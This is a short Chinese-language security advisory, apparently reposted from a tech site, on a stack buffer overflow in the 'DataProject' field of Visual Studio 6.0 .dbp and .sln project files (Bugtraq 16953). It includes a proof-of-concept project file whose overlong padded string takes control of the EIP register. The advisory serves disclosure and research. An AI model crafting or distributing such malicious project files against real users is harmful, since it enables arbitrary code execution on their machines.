vs dbp和sln文件dp字段缓冲区溢出漏洞
作者:佚名 出处:网络 08-04-01 11:12:08
好 评论
条
进入论坛阅读提示:信息提供安全公告(或线索)提供热线:51cto.editor@gmail.com漏洞类别:输入验证漏洞攻击类型:远程攻击发布日期:2006-03-04更新日期:2006-03-06受影响系统:microsoft visual studio 6.0microsoft visual interd
|
信息提供 | 安全公告(或线索)提供热线:51cto.editor@gmail.com | 漏洞类别: | 输入验证漏洞 | 攻击类型: | 远程攻击 | 发布日期: | 2006-03-04 | 更新日期: | 2006-03-06 | 受影响系统: | microsoft visual studio 6.0
microsoft visual interdev 6.0 | 安全系统: | 无 | 漏洞报告人: | kozan (kozan@spyinstructors.com)
atmaca (atmaca@atmacasoft.com) | 漏洞描述: | bugtraq id: 16953
microsoft visual studio是微软公司的开发工具套件系列产品,是一个基本完整的开发工具集,包括了软件整个生命周期中所需要的大部分工具。
visual studio的数据库项目文件(.dbp)和解决方案(.sln)文件格式中存在缓冲区溢出漏洞,攻击者可能利用此漏洞在机器上执行任意指令。
如果这些文件的“dataproject”字段中包含有超长的字符串的话,就会触发栈溢出,完全控制eip寄存器,导致执行任意指令。 | 测试方法: | 警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! # microsoft developer studio project file - database project
begin dataproject = "project1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaxxxx \
aaaa123456aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
end | |
解决方法: | 厂商补丁:
microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/
|
|
【责任编辑:0】
【相关评论】
